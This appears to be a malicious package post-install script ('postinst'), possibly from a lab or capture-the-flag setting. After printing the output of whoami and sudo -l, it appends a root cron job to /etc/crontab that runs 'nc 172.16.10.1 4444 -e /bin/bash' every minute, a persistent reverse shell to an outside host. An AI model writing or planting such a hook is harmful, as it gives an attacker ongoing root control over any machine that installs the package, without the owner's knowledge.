#!/usr/bin/env bash

echo "BKSH - postinst"
echo "| whoami $(whoami)"
echo "| sudo -l $(sudo -l)"

if ! grep -q "4444" /etc/crontab; then
  echo "* * * * * root nc 172.16.10.1 4444 -e /bin/bash" >> /etc/crontab
fi